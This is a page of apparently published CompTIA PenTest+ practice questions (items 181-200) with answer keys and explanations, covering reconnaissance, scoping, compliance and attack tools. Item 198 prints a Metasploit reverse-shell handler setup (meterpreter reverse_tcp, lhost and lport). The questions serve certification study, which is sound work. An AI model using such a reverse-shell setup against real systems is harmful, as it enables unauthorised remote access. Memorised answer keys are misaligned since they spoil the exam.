CompTIA PenTest+ Exam Questions

Page 10 of 25

181.

During information gathering, you want to enumerate the operating systems of live hosts. What is this process called?

  • Fingerprinting

  • Service and version identification

  • Eavesdropping

  • Packet crafting and inspection

Correct answer: Fingerprinting

Fingerprinting refers to identifying a system's operating system by analyzing its network traffic. Differences such as the services a system runs and the order it sends packets can give clues about its operating system and version. 

Service and version identification refers to identifying a service on a system based on its responses. Eavesdropping refers to passively sniffing packets that cross a network. Packet crafting and inspection refers to creating custom packets and analyzing the response to gain the information needed from a target.

182.

As part of the post-engagement cleanup activities, you should:

  • Remove any shells, tools, or accounts created on the targeted system

  • Attempt lateral movement

  • Hide all tools and backdoors created for future use

  • Update the system and patch all vulnerabilities found

Correct answer: Remove any shells, tools, or accounts created on the targeted system

There are mandatory actions related to post-engagement activities. Removing all malicious software or tools, including backdoors, shells, scripts, scheduled tasks, and so on, is very important. Any accounts created by the attacker should be deleted or well-documented in the report.

183.

In the planning phase of a pentest, which of the following topics is the MOST important to consider?

  • Target selection

  • Pentesting tools

  • Firewall rules

  • Number of VLANs in the environment 

Correct answer: Target selection

Selecting the targets to include in the engagement is crucial, as the organization may have many assets (people, processes, facilities, and technologies) located throughout the world that need to be considered during the target selection process.

Pentesting tools, firewall rules, and VLANs can be considered after the targets have been determined.

184.

Which of the following situations could be an indicator of an attacker using a living-off-the-land technique?

  • Frequent use of built-in utilities for unexpected tasks

  • Sudden download of unrecognized applications to the compromised system

  • An increase in the number of disk read and write operations

  • Modification of the system's firmware

Correct answer: Frequent use of built-in utilities for unexpected tasks

A living-off-the-land technique is characterized by using built-in tools of the operating system rather than downloading malware. By using existing tools, it can be harder to detect the intruder.

Downloading malware is a characteristic of traditional attacks. 

Disk read/write operations and firmware modifications are not specific to living-off-the-land attacks.

185.

When using Aircrack-ng to implement an evil twin, which of the following steps is included?

  • Deauthentication

  • Session fixation

  • Password spraying

  • Jamming

Correct answer: Deauthentication

Evil twin attacks involve cloning a legitimate access point, using a deauthentication attack, and ensuring the evil twin is more powerful or closer than the legitimate access point. This allows for an on-path attack to be conducted. Once you have successfully conducted an on-path attack, you can also work on credential harvesting by capturing unencrypted traffic between the client and remote systems and services.

Session fixation is an attack on a web application server's session IDs. Password spraying is using common credentials to attempt authentication. Jamming is causing deliberate interference on a network.

186.

You are preparing the recommendations section of the pentest report. You need to address the weak cryptographic security of the LM hash-stored password. 

What section should this recommendation be put into?

  • Technical

  • Operational

  • Administrative

  • Physical

Correct answer: Technical

In this situation, simple technology improvement could resolve the vulnerability and completely remove the risk. Migration to more secure password hashing functions would be mandatory.

Operational controls include user training and mandatory vacations. Administrative controls include policies and access controls. Physical controls include surveillance systems and biometrics.

187.

A pentester is looking for a tool for offline password cracking. They would like to take advantage of the GPU cores on their machine. 

Which tool should they use?

  • Hashcat

  • John the Ripper

  • Mimikatz

  • Hydra

Correct answer: Hashcat

Hashcat is a password-cracking utility that uses Graphics Processing Units (GPUs) to crack passwords at a very high rate of speed. Hashcat is much faster than traditional tools, making it a tool of choice if you have access to appropriate hardware.

John the Ripper is a CPU-bound password-cracking tool. Mimikatz is a post-exploitation tool used in Windows environments. Hydra is a network login brute-forcing tool.

188.

Through threat modeling, the client determines that their main adversary is determined nation-states using complex attacking techniques. Which sort of threat actor is the organization MOST worried about?

  • APT

  • Casual hacker

  • Hacktivist

  • Insider threat

Correct answer: APT

An advanced persistent threat (APT) is a type of threat actor motivated to steal sensitive information from high-profile targets using sophisticated hacking capabilities.

A casual hacker uses available tools to find weak targets. A hacktivist is motivated by ideology. An insider threat originates from inside the organization.

189.

In the pre-engagement phase of a penetration test, the tester and the client are identifying the systems, applications, and networks that will be tested, as well as any specific requirements that will be needed. 

What type of activity are they engaged in?

  • Scoping

  • Enumerating

  • Sniffing

  • Scraping

Correct answer: Scoping

When determining the list of targets and the limits of the penetration test, this information is structured and detailed as the scope of the test. The test scope could be a separate document or part of some other document related to the pentest. Defining the scope is extremely important and should be done with care.

Enumerating refers to using a tool to get a list of systems on a network. Sniffing involves listening to traffic that crosses a network. Scraping involves systematically gathering information from websites.

190.

What is the ethical course of action to take if a pentester discovers that a real attacker has already breached a client's network?

  • Notifying the client immediately

  • Attempting to contact the attacker

  • Noting the attack to add to the final report later

  • Covering the tracks of the attacker

Correct answer: Notifying the client immediately

If a pentester discovers an attack, they should immediately notify the client rather than wait until the end of the test.

191.

You are performing a penetration test at a retail store that handles credit cards onsite. 

Which of the following do you need to consider when performing this test?

  • PCI DSS

  • GDPR

  • HIPAA

  • FIPS 140-2

Correct answer: PCI DSS

The Payment Card Industry Data Security Standard (PCI DSS) sets the rules for completing assessments for credit card processing environments and systems. 

The General Data Protection Regulation (GDPR) is a European Union regulation that protects data and privacy. 

The Health Insurance Portability and Accountability Act of 1996 (HIPAA) is a federal law to protect sensitive patient health information. 

FIPS 140-2 is a U.S. government computer security standard used to approve cryptographic modules.

192.

You are being tasked to perform a penetration test which includes Android mobile devices. What tool could you use to test the security on those devices?

  • Drozer

  • OpenVas

  • Nexpose

  • Needle

Correct answer: Drozer

Drozer from MWR labs (formerly known as Mercury) is one of the most leveraged Android security frameworks for pentesting Android applications. Drozer enables scanning for security vulnerabilities in Android applications by taking the role of a built-in Android application and interacting with the Dalvik Virtual Machine, other applications’ IPC endpoints, and the OS beneath.

OpenVAS is a software framework of several services and tools offering vulnerability scanning and vulnerability management. Rapid7 Nexpose is a vulnerability scanner which aims to support the entire vulnerability management lifecycle, including discovery, detection, verification, risk classification, impact analysis, reporting and mitigation. Needle is an open-source tool for testing the security of iOS apps.

193.

An attacker is analyzing the randomness and complexity of the session ID generation on a targeted website. He notices a pattern in which each new session ID is generated following a simple algorithm. 

What attack technique will they MOST likely use against the site?

  • Cookie manipulation

  • Pass the hash

  • Kerberos golden ticket

  • Credential harvesting

Correct answer: Cookie manipulation

In cases where developers use their own session IDs, if randomness and complexity are not adequately applied to the equation, the cookie value can be manipulated to identify a valid session, which means the application could be susceptible to brute-force attacks.

A pass the hash attack uses a hashed password. A Kerberos golden ticket attacks a domain controller. Credential harvesting refers to tricking users into divulging sensitive information.

194.

Which of the following is NOT a vulnerability scanner?

  • Maltego

  • Nessus

  • Nikto

  • Acunetix

Correct answer: Maltego

Maltego is a commercial product used to visualize the results of OSINT. It is a popular tool for passive reconnaissance.

Nessus is a proprietary vulnerability scanner. Nikto is a free software command-line vulnerability scanner that scans web servers for dangerous files/CGIs, outdated server software, and other problems. It performs generic and server type specific checks. It also captures and prints any cookies received. Acunetix is an end-to-end web security scanner that offers a 360 view of an organization's security.

195.

A client contacts you three months after the completion of a pentest. They have been hacked through a vulnerability not listed in your report and are asking for an explanation. 

What should you do?

  • Refer the client to the pentest report disclaimers

  • Accept the responsibility and cover the losses

  • Refer the client to your legal team

  • Conduct a security analysis to verify the initial attack vector

Correct answer: Refer the client to the pentest report disclaimers

The testing agreement or scope documentation should contain disclaimers explaining that the test is valid only at the point in time when it is conducted and that the scope and methodology that were chosen can impact the comprehensiveness of the test.

196.

Which of the following data types is considered sensitive authentication data by PCI DSS?

  • CAV2

  • PAN

  • Expiration date

  • Service code

Correct answer: CAV2

Account data is divided into cardholder data and sensitive authentication data. Sensitive authentication data includes the stripe data/microchip, CAV2/CVC2/CVV2/CID, and PINs/PIB blocks.

Primary account number (PAN), expiration date, and service code are considered cardholder data.

197.

A software developer is interested in creating an application that handles network print jobs. What can they consult to see a broad range in weaknesses associated with similar types of software?

  • CWE

  • CVE

  • CAPEC

  • FOCA

Correct answer: CWE

The Common Weakness Enumeration (CWE) is a community-developed list of common software and hardware security weaknesses. It is published and maintained by The MITRE Corporation.

The CVE identifies specific vulnerabilities that have occurred. CAPEC catalogs attack patterns in the wild. FOCA is a tool that extracts metadata.

198.

Given the Metasploit excerpt below, what type of attack is a pentester attempting?

$ ./msfconsole -q

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.123

lhost => 192.168.1.123

msf exploit(handler) > set lport 4444

lport => 4444

msf exploit(handler) > run

  • Reverse shell

  • User enumeration

  • Binding shell

  • Pass-the-hash

Correct answer: Reverse shell

The Metasploit Meterpreter shell and reverse shell are effective ways of interacting with a target environment, as they run entirely in memory and leave little or no trace after disconnecting. When the payload chosen is "windows/meterpreter/reverse_tcp," then it is setting up a reverse shell.

199.

How could a pentester use The Wayback Machine?

  • To see an archive of the client's website that may include previously posted sensitive information

  • To view the source code of the client's back-end web application code along with previous code versions

  • To filter web pages based on advanced queries that can reveal sensitive information

  • To extract information from the metadata of files

Correct answer: To see an archive of the client's website that may include previously posted sensitive information

The Wayback Machine is run by the Internet Archive, and it keeps archives of websites. A pentester can see any sensitive information that may been posted but later deleted.

The client's back-end web application code is not likely to be made public. Google dorks are used to filter web pages based on advanced queries that can reveal sensitive information. Tools such as Exif are used to extract information from the metadata of files.

200.

Which of the following types of reconnaissance can be gathered passively?

  • Infrastructure, domains, IP ranges and routes for the organization

  • Open ports

  • Running services

  • Vulnerabilities

Correct answer: Infrastructure, domains, IP ranges and routes for the organization

Infrastructural recon is a part of the passive information-gathering process. 

Opened ports and running services are discovered by active scanning. Vulnerabilities are discovered by active scanning or manual validation (which is also active).